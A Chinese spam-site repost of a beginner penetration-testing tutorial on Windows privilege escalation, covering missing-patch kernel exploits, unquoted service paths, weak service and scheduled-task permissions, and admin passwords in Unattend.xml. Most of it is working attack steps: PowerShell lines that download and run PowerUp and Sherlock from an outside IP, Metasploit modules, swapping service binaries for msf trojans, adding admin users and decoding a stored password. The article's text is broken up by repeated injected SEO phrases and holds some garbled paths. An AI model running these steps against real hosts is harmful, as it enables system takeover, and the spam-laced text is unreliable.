hi,你好!欢迎访问本站!登录
推文论坛
当前位置:首页 - 科技生活 - 正文

安全正规的黑客网站(黑客网站)-内网渗透测试:Windows权限提升思路(上)

2020-11-18科技生活科技生活16312°c
A+ A-

  

  在Windows中,有User、Administrator、System、TrustedInstaller这四种用户权限,其权限从左到右依次升高。而我们在一般的实战中,获得的权限较低,低权限将使渗透测试受到很多的限制。这就要求我们将当前权限提升到足以满足我们要求的高权限。

  权限提升的方式大概有以下两类:

  纵向提权:低权限用户获得高权限角色的权限。横向提权:获得同级别角色的权限。

安全正规的黑客网站(黑客网站)  常用的提权方法有Windows系统内核溢出漏洞提权、错误的系统配置提权、数据库提权等等。下面我们对常用的几种提权的方法进行逐一演示。

  本文专为小白所写,内容较为基础且丰富,大佬可以路过还望多多点评哦。

  溢出漏洞是一种计算机程序的可更正性缺陷。溢出漏洞的全名:缓冲区溢出漏洞。因为它是在程序执行的时候在缓冲区执行的错误代码,所以叫缓冲区溢出漏洞。缓冲溢出是最常见的内存错误之一,也是攻击者入侵系统时所用到的最强大、最经典的一类漏洞利用方式。成功地利用缓冲区溢出漏洞可以修改内存中变量的值,甚至可以劫持进程,执行恶意代码,最终获得主机的控制权。利用Windows系统内核溢出漏洞提权是一种很通用的提权方法,攻击者通常可以使用该方法绕过系安全正规的黑客网站(黑客网站)统中的所有安全限制。攻击者利用该漏洞的关键是目标系统有没有及时安装补丁,如果目标系统没有安装某一漏洞的补丁且存在该漏洞的话,攻击者就会向目标系统上传本地溢出程序,溢出Administrator权限。下面演示提权过程。1. 手动查找系统潜在漏洞获取目标主机的一个普通用户的shell后,执行如下命令,查看目标系统上安装了那些补丁:

  systeminfo

  或

  wmic qfe get caption,description,hotfixid,installedon

  可以看到系统就装了这几个补丁。攻击者会通过没有列出的补丁号,寻找相应的提权EXP,例如KiTrap0D和KB979682对应、MS10-021和KB979683对应等等。然后使用目标机上没有的安装的补丁号对应的EXP进行提权。Windows不同系统提权的漏洞和相应的补丁请见:点我呀。

  方法一:Windows Exploit Suggester

  下载地址:安全正规的黑客网站(黑客网站)https://github.com/GDSSecurity/Windows-Exploit-Suggester

  该工具可以将系统中已经安装的补丁程序与微软的漏洞数据库进行比较,并可以识别可能导致权限提升的漏洞,而且其只需要我们给出目标系统的信息即可。

  使用如下:

  首先更新漏洞数据库,会生成一个xls的文件,如下 2020-08-20-mssb.xls

  python2 windows-exploit-suggester.py --update

  然后执行如下命令,查看目标主机系统信息,保存为sysinfo.txt文件:

  systeminfo > sysinfo.txt

  最后,运行如下命令,查看该系统是否存在可利用的提权漏洞:

  python2 windows-exploit-suggester.py -d 2020-08-20-mssb.xls -i sysinfo.txt

  如上图,执行后,给出了一堆目标系统存在的漏洞(毕竟是靶机嘛~~~)

  方法二:local_exploit_suggester 模块

  Metasploit内置模块提供了各种可用于提权的local exploits,并会基于架构,平台(即运行的操作系统),会话类型和所需默认选项提供建议。这极大的节省了我们的时间,省去了我们手动搜索local exploits的麻烦。

  使用如下,假设我们已经获得了目标主机的一个session:

  use post/multi/recon/local_exploit_suggester

  set session 1

<安全正规的黑客网站(黑客网站)p>  exploit

  

  如上图,该模块快速识别并列出了系统中可能被利用的漏洞,十分方便。但虽然如此,也并非所有列出的local exploits都可用。

  方法三:enum_patches 模块

  会用metasploit中的post/windows/gather/enum_patches模块可以根据漏洞编号快速找出系统中缺少的补丁。使用如下:

  use 安全正规的黑客网站(黑客网站) post/windows/gather/enum_patches

  set session 1

  exploit

  在实际的查找潜在漏洞的过程中,建议手动和自动双管齐下。

  下载地址:https://github.com/rasta-mouse/Sherlock

  该脚本可以快速的查找出可能用于本地权限提升的漏洞。使用如下:

  powershell -exec bypass -c IEX(New-Object Net.WebClient).DownloadString('http://39.xxx.xxx.210/Sherlock.ps1'); // 远程执行

安全正规的黑客网站(黑客网站)

  Import-Module 目录\Sherlock.ps1 本地执行

  Find-AllVulns // 调用脚本后,执行搜索命令

  

  查找了目标机器上的补丁并确定存在漏洞后,我们就可以像目标机器上传本地溢出程序,并执行。这里,我们选择的是CVE-2018-8120。

  漏洞利用程序可以从以下几个地址中下载:(里面附有使用说明)

  Windows 安全正规的黑客网站(黑客网站) 下的提权大合集:https://github.com/lyshark/Windows-exploitsWindows内核溢出漏洞提权大全:https://github.com/SecWiki/windows-kernel-exploits各大平台提权工具:https://github.com/klsfct/getshell

  

  执行:

  如上图,再执行提权程序之前,为普通用户whoami权限,执行后为system权限。msfconsole上完整操作如下:

  

  在Windows系统中,攻击者通常会通过系统内核溢出漏洞来提权,但是如果碰到无法通过系统内核溢出漏洞提权的情况时,会可以利用系统中的错误配置漏洞来提权。下面演示几种常见的Windows系统错误配置漏洞提权方法。

  Trusted 安全正规的黑客网站(黑客网站) Service Paths 漏洞是由系统中的“CreateProcess”函数引起的,并利用了windows文件路径解析的特性。

  首先,我们来认识一下Windows中文件路径解析的特性。例如,我们有一个文件路径为“C:\Program Files\Some Folder\Service.exe”。那么,对于该路径中的每一个空格,Windows都会尝试寻找并执行与空格前面的名字相匹配的程序。如上面的目录为例,Windows会依次尝试确定和执行一下程序:

  C:\Program.exeC:\Program Files\Some.exeC:\Program 安全正规的黑客网站(黑客网站) Files\Some Folder\Service.exe

  可见,最后才确定并执行真正的程序Service.exe。而由于Windows服务通常是以system权限运行的,所以系统在解析服务所对应的文件路径中的空格时,也会以system系统权限进行,那么,如果我们将一个“适当命名”的可执行程序上传到以上所说的受影响的目录中,服务一旦启动或重启,该程序就会以system权限运行了,可见该漏洞利用了服务路径的文件/文件夹的权限。

  该漏洞是由于一个服务的可执行文件没有正确的处理所引用的完整路径名,即一个服务的可执行文件的完整路径中含有空格且没有被双引号引起来,那么该服务就存在这个漏洞。下面演示该漏洞利用方法。

  首先,我们安全正规的黑客网站(黑客网站)可以用以下命令列出目标主机中所有存在空格且没有被引号括起来服务路径:

  wmic service get name,displayname,pathname,startmode|findstr /i "Auto" |findstr /i /v "C:\Windows\" |findstr/i /v """

  

  如上图,可以看到“whoami”和“Bunny”这两个服务对应的二进制文件路径没有引号包含起来,并且路径安全正规的黑客网站(黑客网站)中包含空格。是存在该漏洞的,但在上传可执行文件进去之前,我们需要确定我们对目标文件夹是否有写入的权限。

  这里我们使用Windows中的icacls命令,依次来检查“C:\”、“C:\Program Files\Program Folder”等目录的权限发现只有“C:\Program Files\program folder”目录有Everyone(OI)(CI)(F):

  参数说明:

  “M”表示修改“F”代表完全控制“CI”代表从属容器将继承访问控制项“OI”代表从属文件将继承访问控制项。

  这就意味着对该目录有读,写,删除其下的文件,删除该目录下的子目录的权限。

  

  确认目标机器中存在此漏洞后,把要上传的程序重命名并放置在存在此漏洞且可写的目录下,执行如下命令,尝试重启服务。

  sc stop

  sc start

  既然要重启服务,那么我们就可以知道,该提权方法需要管理员权限,重启服务的方法适用于从管理员权限到system的权限提升过程。而实际情况下,我们直接对目标主机执行“shutdown -r -t 安全正规的黑客网站(黑客网站) 0”命令让他重启就行了。

  我们生成一个msf马并重命名为Hello.exe上传到该“C:\Program Files\Program Folder”目录下,然后分别执行如下命令重启该WhoamiTest服务:

  sc stop WhomaiTest

  sc start WhomaiTest

  如下图完整利用过程:

  可知提权前为管理员权限(liukaifeng01),提权成安全正规的黑客网站(黑客网站)功后我们得到一个system权限的session。

  这里要注意,新反弹得到的meterpreter会很快就中断了,这是因为当一个进程在Windows中启动后,必须与服务控制管理进行通信,如果没有通信,服务控制管理器会认为出现了错误,进而终止这个进程。所以,我们要在终止载荷进程之前将它迁移到其他进程中,使用msf的“set AutoRunScript migrate -f”命令即可实现自动迁移进程:

  该提权方法在metasploit中对应的模块为:exploit/windows/local/unquoted_service_path,使用如下:

  (在之前的metasploit中为exploit/windows/local/trusted_service_path,但在新版的metasploit中替换替换成了exploit/windows/local/unquoted_service_path)

  use exploit/windows/local/unquoted_service_path

  set session 1

  set AutoRunScript migrate -f

  exploit

  如上图,提权成功。

  Windows 系统服务文件在操作系统启动时加载和执行,并在后台调用可执行文件。因此,如果一个低权限的用户对此系统服务调用的可执行文件拥有写权限,就可以将该文件替换成任意可执行文件,并随着系统服务的启动获得系统权限。Windows 服务是以System权限运行的,因此,其文件、文件夹和注册表键值都是受强访问控制机制保护的。但是,在某些情况下,操作系统中仍然存在一些没有得到有效保护的服务。

  该漏洞利用有以下两种情况:

  服务安全正规的黑客网站(黑客网站)未运行:攻击者会使用任意服务直接替换原来的服务,然后重启服务。

  服务正在运行且无法终止:这种情况符合绝大多数漏洞利用的场景,攻击者通常会利用DLL劫持技术并尝试重启服务来提权。

  1. 利用PowerUp.ps1脚本

  下载地址:https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp

  这里我们利用一个Powershell的脚本——PowerUp,该脚本的AllChecks模块会检测目标主机存的Windows服务漏洞,然后通过直接替换可执行文件本身来实现权限的提升。

  AllChecks模块的通常应用安全正规的黑客网站(黑客网站)对象如下:

  没有被引号引起来的服务的路径。服务的可执行文件的权限设置不当Unattend.xml文件注册表键AlwaysInstallElevated

  将该脚本远程下载或本地导入后,执行Invoke-AllChecks命令进行漏洞检测

  powershell -exec bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://39.xxx.xxx.210/PowerUp.ps1');Invoke-ALLChecks"

  如上图,可以看到PowerUp列出了所有可能存在该漏洞的服务的信息,并在AbuseFunction部分直接给出了利用方式。我们可以看到,目标主机的WhoamiTest服务可能存在该漏洞,然后我们再用icacls命令来测试该服务的可执行文件目录的“C:\Program Files\Program Folder\Hello Whoami\whoami.exe”文件是否有写入权限:

  icacls "C:\Program Files\Program Folder\Hello Whoami\whoami.exe"

  如上图,可以看到我们对whoami.exe文件是有完全控制权的,那么我们就可以直接将whoami.exe替换成我们的msf马,当服务重启时,我们就会得到一个System权限的meterpreter。

  这里,我们用“AbuseFunction”那里已经给出的具体操作方式,执行如下。

  将原来的服务可执行文件备份,并用一个可添加管理员用户的恶意可执行文件代替它,默认添加的用户名为join,密码为Password123!:

  powershell 安全正规的黑客网站(黑客网站) -exec bypass -c IEX(New-Object Net.WebClient).DownloadString('http://39.xxx.xxx.210/PowerUp.ps1');Install-ServiceBinary -ServiceName 服务名

  接下来停止并再启动该服务的时候,但由于我们当前是普通用户,我们没有权限重启服务,所以我们可以等目标系统重启,我们通过msf控制目标机执行“shutdown -r”命令来安全正规的黑客网站(黑客网站)重启,重启后即可成功创建join用户:

  

  添加指定的管理员用户:

  Install-ServiceBinary -ServiceName 服务名 -UserName Bunny -Password Liufupeng123

  

  

  执行命令:

  Install-ServiceBinary -ServiceName 服务名 -Command "whoami"? ?// -Command后加要执行的命令

  2. Metasploit中的service_permissions模块

  该漏洞提权在metasploit上面对应的模块为exploit/windows/local/service_permissions:

  

  如上图,该模块有两个可以设置的选项,其中如果把AGGRESSIVE选项设为“true”,则可以利用目标机器上每一个有该漏洞的服务,设为“false”则在第一次提权成功后就会停止工作。演示如下:

  (别忘了迁移进程哦~~)

  如果攻击者对以高权限运行的任务所在的目录具有写权限,就可以使用恶意程序覆盖原来的程序,这样在下次计划执行时,就会以高权限来运行我们的恶意程序。下面详细的进行演示。

  首先可以利用如下命令查看计算机的计划任务:

  schtasks /query /fo list /v

  schtasks /query /fo list /v > schtasks.txt

  如上图,我们可以看到,在 C:\Program Files\schtasks\whoami目录有一个test.exe程序,它会在一个时间点自动运行,它会在计算机每次启动时运行,并且是用SYSTEM权限运行的。然后让我们看下我们对这个计划任务的路径是否有写入权限。

  我推荐使用AccessChk工具,其为SysInterals套件里的一个工具,常用于Windows中进行一些系统或程序的高级查询、管理和排除故障等。AccessChk是微软官方的工具,一般不会引起杀软的报警没所以常会被攻击者利用下载地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/accesschk

  执行以下命令,查看指定目录的权限配置情况:

  accesschk.exe 安全正规的黑客网站(黑客网站) -dqv "C:\Program Files\schtasks\whoami" -accepteula

  

  可以清楚地看到,这里有一个很严重的配置错误,对于这个计划任务“test”来说,这里不仅用了system权限来运行,更糟糕的是,任何经过身份验证的用户(Authenticated?Users)都对这个文件夹有写入的权限。所以,我们可以生成一个木马,做一个后门就可以了,在本次演示例子中,我们可以简单的用msf木马覆盖掉原来的“test.exe”,如下图我们将原来的test.exe备份后,上传我们自己生成的“test.exe”(msf木马):

  然后重开一个msfconsole,设置好监听,接下来对目标机执行重启命令“shutdown -r -t 0”让其重新启动:

  

  重新启动目标主机后,在另一个msfconsole上面即可得到system权限的session:

  成功。

  通过上面的例子,我们可以看出accesschk称得上是查找有权限配置缺陷文件夹的必备工具,下面是accesschk的一些其他使用实例。

<安全正规的黑客网站(黑客网站)p>  当第一次执行任何sysinternals工具包里的工具时,当前用户将会看到一个最终用户许可协议弹框,这是一个大问题,然而我们可以添加一个额外的参数“/accepteula”去自动接受许可协议,即:

  accesschk.exe /accepteula

  Accesschk可以自动的检查当我们使用一个特定的用户时,我们是否对Windows的某个服务有写的权限。当我们作为一个低权限用户,我们首先就想要看一下“Authenticated Users”组对这些服务的权限。

  找出某个驱动器下所有权限配置有缺陷的文件夹路径

  accesschk.exe -uwdqs Users c:\

<安全正规的黑客网站(黑客网站)p>  accesschk.exe -uwdqs "Authenticated Users" c:\

  找出某个驱动器下所有权限配置有缺陷的文件

  accesschk.exe -uwqs Users c:\*.* ?

  accesschk.exe -uwqs "Authenticated Users" c:\*.*

  

  如上图可以看到对这个目录下的每一个文件它都列出了Authenticated 安全正规的黑客网站(黑客网站) 安全正规的黑客网站(黑客网站) Users用户组的权限,R为读权限,W为写权限,RW表示有读写权限,如果前面为空则表示没有权限。

  根据前面这几个提权的思路,当我们检查文件或文件夹权限的时候,需要考虑哪些点事易受攻击的点。你需要花费时间来检查所有的启动路径,Windows服务,计划任务和Windows启动项等。

  网络管理员在内网中给多台机器配置同一个环境时,通常不会逐台配置,而是会采用脚本化批量部署的方法。在这一过程中,会使用安装配置文件。这些文件中包含所有的安装配置信息,其中的一些还可能包含本地管理员的账号和密码等信息。我们可以对整个系统进行检查,这些安装配置文文件列举如下:

  C:\sysprep.inf

  C:\syspreg\sysprep.xml

  C:\Windows\system32\sysprep.inf

  C:\windows\system32\sysprep\sysprep.xml

  C:篭end.xml

  C:\Windows\Panther\Unattend.xml

  C:\Windows\Panther\Unattended.xml

  C:\Windows\Panther\Unattend\Unattended.xml

  C:\Windows\Panther\Unattend\Unattend.xml

安全正规的黑客网站(黑客网站)  C:\Windows\System32\Sysprep\Unattend.xml

  C:\Windows\System32\Sysprep\Panther\Unattend.xml

  全盘搜索Unattend文件是个好办法,可以用以下命令来全盘搜索Unattend.xml文件:

  dir /b /s 安全正规的黑客网站(黑客网站) c:\Unattend.xml/S:显示指定目录和所有子目录中的文件。

  除了Unattend.xml文件外,还要留意系统中的sysprep.xml和sysprep.inf文件,这些文件中都会包含部署操作系统时使用的凭据信息,这些信息可以帮助我们提权。

  打开文件之后格式为xml格式然后可以进行搜索、、、、、或者经过base64加密的密码,因为我们只需要这部分,例如:

  ......

  

  

  

  

  UEBzc3dvcmQxMjMhUGFzc3dvcmQ=

  

false</PlainText></p><p>  </Password></p><p>  <Description>Local Administrator</Description></p><安全正规的黑客网站(黑客网站)p>  <DisplayName>Administrator</DisplayName></p><p>  <Group>Administrators</Group></p><p>  <Name>Administrator</Name></p><p>  </LocalAccount></p><p>  </LocalAccounts></p><p>  </UserAccounts></p><p>  ......</p><p>  在这个Unattend文件中,我们可以看到一个本地账户被创建并加入到了管理员组中。管理员密码没有以明文形式显示,但是显然密码是以Base64进行编码的。</p><p>  echo "UEBzc3dvcmQxMjMhUGFzc3dvcmQ=" 安全正规的黑客网站(黑客网站) | base64 -d</p><p>  <img src=https://www.hzccw.com/zb_users/upload/2020/11/202011181605669426659065.jpg alt="" width=672 height=51></p><p>  解密得密码为"P@ssword123!Password",但是微软在进行编码前会在Unattend文件中所有的密码后面都追加"Password",所以我们本地管理员的密码实际上是"P@ssword123!"。</p><p>  1. 在Metasploit中利用的相应模块为</p><p>  这个模块仅仅只是搜索Unattend.xml文件,然而会忽略其他像syspref.安全正规的黑客网站(黑客网站)xml和syspref.inf这样的文件。简而言之,这个模块就是全盘搜索Unattend.xml文件并读取出管理员账户密码。</p><p>  <img src=https://www.hzccw.com/zb_users/upload/2020/11/202011181605669428383847.jpg alt="" width=690 height=375>2. PowerUp中利用的模块</p><p>  powershell -exec bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://39.101.219.210/powerup.ps1');Get-UnattendedInstallFile"</p><p>  <img 安全正规的黑客网站(黑客网站) src=https://www.hzccw.com/zb_users/upload/2020/11/202011181605669429165980.jpg alt="" width=690 安全正规的黑客网站(黑客网站) height=167></p><p>  本节中,我们主要介绍了Windows系统内核溢出漏洞提权和windows系统错误配置漏洞提权的可信任服务路径漏洞提权、系统服务错误权限配置漏洞提权、自动安装配置文件提权。其中最常用的可能就是Windows系统内核溢出漏洞提权了,windows系统错误配置漏洞不仅可以用来提权,在获取高权限后还可以用来设置一个高权限后门,以备后用。</p><p>  文章比较详细了,很适合像我一样的小白来学习。在下节中,我们将继续对windows系统错误配置漏洞提权中的注册表键AlwaysInstallElevated提权、组策略提权、令牌窃取等进行详细的讲解,敬请期待。</p><p>  参考:</p><p>  https://www.fadqcl.com/articles/system/131388.html</p><p>  https://www.fadqcl.com/articles/system/184289.html</p><p>  https://www.fadqcl.com/vuls/87463.html</p><p>  https://www.anquanke.com/post/id/84855</p><p>  https://blog.csdn.net/qq_安全正规的黑客网站(黑客网站)36119192/article/details/104280692</p><p>  <img src=https://www.hzccw.com/zb_users/upload/2020/11/202011181605669431773005.jpg alt="" width=690 height=501>因小白我初来乍到,必有很多不足之处,还请各位前辈多多指教,小生还需多多向各位前辈学习。</p></div><div class="pidz-whj-lo-mk wennr-fen"> 标签:<a href="https://www.hzccw.com/t-2567.html" rel="tag">黑客网站</a><a href="https://www.hzccw.com/t-307469.html" rel="tag">提权</a><a href="https://www.hzccw.com/t-39892.html" rel="tag">漏洞</a></div><footer class="er-hnnb-im wennr-foot-cn"><p><span>本文来源:</span><a href="https://www.hzccw.com/" target="_blank">推文收录网</a></p><p><span>本文地址:</span><a href="https://www.hzccw.com/i/89811.html">https://www.hzccw.com/i/89811.html</a></p><p><span>版权声明:</span>本站收录微信公众号文章内容全部来自于网络,部分内容为用户投稿内容,本站所有内容仅供个人学习、研究或者欣赏使用。版权归原作者所有。禁止一切商业用途。其中内容并不代表本站赞同其观点和对其真实性负责,也不构成任何其他建议。如果您发现本站上有侵犯您的知识产权的内容,请与我们联系,我们会及时修改或删除。</p></footer></article><div class="om-hvqg-ld-so xiangguan"><div class="fqn-dxuo-dot-agtk xiangguan-txt"><div class="pu-vit-rr-vh xiangguan-txt-lf lf"><i class="fyi-ww-dth fa fa-line-chart"></i>推荐阅读</div><div class="ozzn-bu-knoq-xcde xiangguan-txt-lr lr"><a href="https://www.hzccw.com/cat/technology.html" title="分类 科技生活 的全部文章" rel="category tag">更多>></a></div></div><div class="mbyz-vvi-na xiangguan-ul clear"><ul class="gm-un-ys-elqz clear"><li><span>•</span><a href="https://www.hzccw.com/i/89818.html" title="请问怎么找黑客帮忙(从哪里找黑客帮忙办事)-Weblogic XMLDecoder 漏洞触发链分析">请问怎么找黑客帮忙(从哪里找黑客帮忙办事)-Weblogic XMLDecoder 漏洞触发链分析</a></li><li><span>•</span><a href="https://www.hzccw.com/i/38717.html" title="黑吧安全网">黑吧安全网</a></li><li><span>•</span><a href="https://www.hzccw.com/i/72632.html" title="NOSEC安全讯息平台 _ 白帽汇安全研究院">NOSEC安全讯息平台 _ 白帽汇安全研究院</a></li><li><span>•</span><a href="https://www.hzccw.com/i/57218.html" title="补天 _ 企业和白帽子共赢的漏洞响应平台_帮助企业建立SRC">补天 _ 企业和白帽子共赢的漏洞响应平台_帮助企业建立SRC</a></li><li><span>•</span><a href="https://www.hzccw.com/i/88934.html" title="黑客是怎么攻击别人的(全球黑客攻击实时图)-漏洞管理系统建设浅议|企业漏洞库建模要素">黑客是怎么攻击别人的(全球黑客攻击实时图)-漏洞管理系统建设浅议|企业漏洞库建模要素</a></li><li><span>•</span><a href="https://www.hzccw.com/i/89551.html" title="黑客入门基础知识网站(黑客入门知识)-更新:补丁发布 | Microsoft Windows SMBv3.0服务远程代码执行漏洞(CVE">黑客入门基础知识网站(黑客入门知识)-更新:补丁发布 | Microsoft Windows SMBv3.0服务远程代码执行漏洞(CVE</a></li><li><span>•</span><a href="https://www.hzccw.com/i/61093.html" title="Seebug _ 洞悉漏洞_让你掌握第一手漏洞情报!">Seebug _ 洞悉漏洞_让你掌握第一手漏洞情报!</a></li><li><span>•</span><a href="https://www.hzccw.com/i/70543.html" title="FreeBuf网络安全行业门户">FreeBuf网络安全行业门户</a></li><li><span>•</span><a href="https://www.hzccw.com/i/89783.html" title="黑客技术入侵网站教学(黑客技术教学网站)-日志分析之某网站weblogic服务停止事件分析">黑客技术入侵网站教学(黑客技术教学网站)-日志分析之某网站weblogic服务停止事件分析</a></li><li><span>•</span><a href="https://www.hzccw.com/i/89591.html" title="黑客是通过什么方法追款的(网赌黑客追款无前期)-刚刚,绿盟云针对Apache Tomcat文件包含漏洞的在线检测正式上线">黑客是通过什么方法追款的(网赌黑客追款无前期)-刚刚,绿盟云针对Apache Tomcat文件包含漏洞的在线检测正式上线</a></li></ul></div></div><div class="dxdh-uql-krc nextnav clear"><div class="yrva-nypy-ah-qva nextnav-lf lf"><span><i class="kw-yd-wzlr fa fa-angle-left"></i> 上一篇</span><a href="https://www.hzccw.com/i/89810.html" title="怎么进入华夏黑客联盟(中国华夏黑客联盟)-一次不用脚本的pwn解题">怎么进入华夏黑客联盟(中国华夏黑客联盟)-一次不用脚本的pwn解题</a></div><div class="jt-ip-rc-rgww nextnav-lf lf lfbo"><span>下一篇 <i class="jh-zrn-tkk-dhz fa fa-angle-right"></i></span><a href="https://www.hzccw.com/i/89812.html" title="如何能成为一个合格的黑客(怎样能成为黑客)-产业安全专家谈 | 银行业小程序安全防护的实践路径">如何能成为一个合格的黑客(怎样能成为黑客)-产业安全专家谈 | 银行业小程序安全防护的实践路径</span></a></div></div></div><div class="owd-hg-vnu main-lr lr"><aside class="alx-wef-bsgw-bn celanbiao" id="divSearchPanel"><h3><i class="aqan-ue-guv-ma fa fa-bars"></i>搜索</h3><div class="rn-pj-estc-szye aside-con clear"><form name=search method="post" action="https://www.hzccw.com/zb_system/cmd.php?act=search"><input type=text name=q size="11" ><input type=submit value="搜索" ></form></div></aside><aside class="alx-wef-bsgw-bn celanbiao" id="vitan"><h3 class="page_speeder_1991254278"></h3><div class="rn-pj-estc-szye aside-con clear"></div></aside><aside class="alx-wef-bsgw-bn celanbiao" id="bbs_api"><h3><i class="aqan-ue-guv-ma fa fa-bars"></i>bbs_api</h3><ul class="rn-pj-estc-szye aside-con clear"><h3><i class='jhw-tlv-nva-hkv fa fa-bars'></i>推文推荐</h3><ul class='fbtx-gn-wfk-dkiu aside-con clear'><li><a target='_blank' href='//www.hzccw.com/html/?thread-8511.htm'>北京金源恒达商贸公司</a></li><li><a target='_blank' href='//www.hzccw.com/html/?thread-31685.htm'>001餐饮加盟网 奶茶加盟 饮品加盟 中国餐饮连锁加盟权威平台</a></li><li><a target='_blank' href='//www.hzccw.com/html/?thread-30381.htm'>过年了,穿红色顶好看啦!</a></li><li><a target='_blank' href='//www.hzccw.com/html/?thread-17933.htm'>就算热,也愉快的出去约会吧!</a></li><li><a target='_blank' href='//www.hzccw.com/html/?thread-21322.htm'>文章巷 经典美文欣赏 精美好文章阅读赏析网</a></li><li><a target='_blank' href='//www.hzccw.com/html/?thread-35435.htm'> 园 开发者的网上家园</a></li><li><a target='_blank' href='//www.hzccw.com/html/?thread-21408.htm'>地板代理 地板十大品牌 锁扣地板加盟 圣达地板</a></li><li><a target='_blank' href='//www.hzccw.com/html/?thread-4945.htm'>任县嘉德机械厂_地址_电话</a></li><li><a target='_blank' href='//www.hzccw.com/html/?thread-25182.htm'>小说 军事小说 历史小说 军事书 图书 铁血读书</a></li><li><a target='_blank' href='//www.hzccw.com/html/?thread-2120.htm'>中国种业互联网</a></li><li><a target='_blank' href='//www.hzccw.com/html/?thread-22406.htm'>Web前端技能 专注Web前端开发与技巧 关注用户体验</a></li><li><a target='_blank' href='//www.hzccw.com/html/?thread-12402.htm'>科兜网 东莞市科技服务超市</a></li><li><a target='_blank' href='//www.hzccw.com/html/?thread-26828.htm'>小贤才 高校招聘管理服务大数据平台 找工作 兼职 实习 海量岗位</a></li><li><a target='_blank' href='//www.hzccw.com/html/?thread-9755.htm'>天津津裕电业有限公司</a></li><li><a target='_blank' href='//www.hzccw.com/html/?thread-11274.htm'>好版本库 GM论坛 传奇一条龙 传奇服务端 传奇单机版 GM基地</a></li><li><a target='_blank' href='//www.hzccw.com/html/?thread-36829.htm'>VR眼镜 VR虚拟现实 VR游戏 VR视频 VR技术 VR下载 VR资讯 青亭网 VR AR产业媒体平台</a></li><li><a target='_blank' href='//www.hzccw.com/html/?thread-33242.htm'>都去下载 安卓游戏下载大全 热门好玩的手游排行榜</a></li><li><a target='_blank' href='//www.hzccw.com/html/?thread-2773.htm'>导游云课堂研修</a></li><li><a target='_blank' href='//www.hzccw.com/html/?thread-19917.htm'>春天怎么能少得了单宁!两款牛仔单品必须要</a></li><li><a target='_blank' href='//www.hzccw.com/html/?thread-18327.htm'>想要仙气飘飘,请先配上女神装备</a></li></ul></ul></aside><aside class="alx-wef-bsgw-bn celanbiao" id="divCalendar"><h3 class="page_speeder_1991254278"></h3><div class="rn-pj-estc-szye aside-con clear"><table id="tbCalendar"><caption><a title="上个月" href="https://www.hzccw.com/date/2021-4.html">«</a>&nbsp;&nbsp;&nbsp;<a href="https://www.hzccw.com/date/2021-5.html"> 2021年5月 </a>&nbsp;&nbsp;&nbsp;<a title="下个月" href="https://www.hzccw.com/date/2021-6.html">»</a></caption><thead><tr><th title="星期一" scope="col"><small>一</small></th><th title="星期二" scope="col"><small>二</small></th><th title="星期三" scope="col"><small>三</small></th><th title="星期四" scope="col"><small>四</small></th><th title="星期五" scope="col"><small>五</small></th><th title="星期六" scope="col"><small>六</small></th><th title="星期日" scope="col"><small>日</small></th></tr></thead><tbody><tr><td></td><td></td><td></td><td></td><td></td><td><a href="https://www.hzccw.com/date/2021-5-1.html" title="2021-5-1 (240)" target="_blank">1</a></td><td><a href="https://www.hzccw.com/date/2021-5-2.html" title="2021-5-2 (239)" target="_blank">2</a></td></tr><tr><td><a href="https://www.hzccw.com/date/2021-5-3.html" title="2021-5-3 (240)" target="_blank">3</a></td><td><a href="https://www.hzccw.com/date/2021-5-4.html" title="2021-5-4 (240)" target="_blank">4</a></td><td><a href="https://www.hzccw.com/date/2021-5-5.html" title="2021-5-5 (240)" target="_blank">5</a></td><td><a href="https://www.hzccw.com/date/2021-5-6.html" title="2021-5-6 (160)" target="_blank">6</a></td><td><a href="https://www.hzccw.com/date/2021-5-7.html" title="2021-5-7 (70)" target="_blank">7</a></td><td>8</td><td>9</td></tr><tr><td>10</td><td>11</td><td>12</td><td>13</td><td>14</td><td>15</td><td>16</td></tr><tr><td>17</td><td>18</td><td>19</td><td>20</td><td>21</td><td>22</td><td>23</td></tr><tr><td>24</td><td>25</td><td>26</td><td>27</td><td>28</td><td>29</td><td>30</td></tr><tr><td>31</td><td></td><td></td><td></td><td></td><td></td><td></td></tr></tbody></table></div></aside><aside class="alx-wef-bsgw-bn celanbiao" id="divCatalog"><h3><i class="aqan-ue-guv-ma fa fa-bars"></i>网站分类</h3><ul class="rn-pj-estc-szye aside-con clear"><li><a title="本站公告" href="https://www.hzccw.com/cat/notice.html">本站公告</a></li><li><a title="网站收录" href="https://www.hzccw.com/cat/website.html">网站收录</a></li><li><a title="其他服务" href="https://www.hzccw.com/cat/cloud.html">其他服务</a></li><li><a title="图库中心" href="https://www.hzccw.com/cat/gallery.html">图库中心</a></li><li><a title="主播资料" href="https://www.hzccw.com/cat/anchor.html">主播资料</a></li><li><a title="用户投稿" href="https://www.hzccw.com/cat/contribute.html">用户投稿</a></li><li><a title="动态说说" href="https://www.hzccw.com/cat/dynamic.html">动态说说</a></li><li><a title="娱乐时尚" href="https://www.hzccw.com/cat/fashion.html">娱乐时尚</a></li><li><a title="星座星势" href="https://www.hzccw.com/cat/constellation.html">星座星势</a></li><li><a title="经典语录" href="https://www.hzccw.com/cat/quotations.html">经典语录</a></li><li><a title="美食天下" href="https://www.hzccw.com/cat/food.html">美食天下</a></li><li><a title="设计装修" href="https://www.hzccw.com/cat/decorate.html">设计装修</a></li><li><a title="爱好游戏" href="https://www.hzccw.com/cat/game.html">爱好游戏</a></li><li><a title="周游全球" href="https://www.hzccw.com/cat/tourism.html">周游全球</a></li><li><a title="科技生活" href="https://www.hzccw.com/cat/technology.html">科技生活</a></li><li><a title="健康养身" href="https://www.hzccw.com/cat/health.html">健康养身</a></li><li><a title="运维优化" href="https://www.hzccw.com/cat/seo.html">运维优化</a></li></ul></aside><aside class="alx-wef-bsgw-bn celanbiao" id="divPrevious"><h3><i class="aqan-ue-guv-ma fa fa-bars"></i>最近发表</h3><ul class="rn-pj-estc-szye aside-con clear"><li><a title="为什么晚上身上痒:皮肤局部瘙痒,晚上特别严重,影响睡眠,是什么原因呢?" href="https://www.hzccw.com/i/122304.html">为什么晚上身上痒:皮肤局部瘙痒,晚上特别严重,影响睡眠,是什么原因呢?</a></li><li><a title="箱包:怎么做手工布包能挺括?" href="https://www.hzccw.com/i/122303.html">箱包:怎么做手工布包能挺括?</a></li><li><a title="韩熙雅abby:韩熙雅风油精事件辣眼睛,网红们为了出名还做过哪些无下限的事?" 